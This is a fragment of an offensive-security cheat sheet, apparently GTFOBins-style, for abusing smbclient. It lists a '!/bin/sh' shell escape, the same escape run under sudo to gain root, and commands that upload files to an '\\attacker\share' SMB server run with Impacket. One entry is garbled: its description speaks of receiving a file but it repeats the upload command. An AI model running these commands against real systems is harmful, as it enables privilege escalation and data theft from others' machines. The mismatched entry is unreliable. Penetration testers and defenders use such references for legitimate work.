| code |
| smbclient '\attacker\share'
!/bin/sh
|
|
|
| description |
code |
| Install [Impacket](https://github.com/SecureAuthCorp/impacket) and run `sudo smbserver.py share /tmp` on the attacker box to collect the file. |
smbclient '\attacker\share' -c 'put file_to_send where_to_save'
|
|
|
| description |
code |
| Install [Impacket](https://github.com/SecureAuthCorp/impacket) and run `sudo smbserver.py share /tmp` on the attacker box to send the file. |
smbclient '\attacker\share' -c 'put file_to_send where_to_save'
|
|
|
| code |
| sudo smbclient '\attacker\share'
!/bin/sh
|
|
|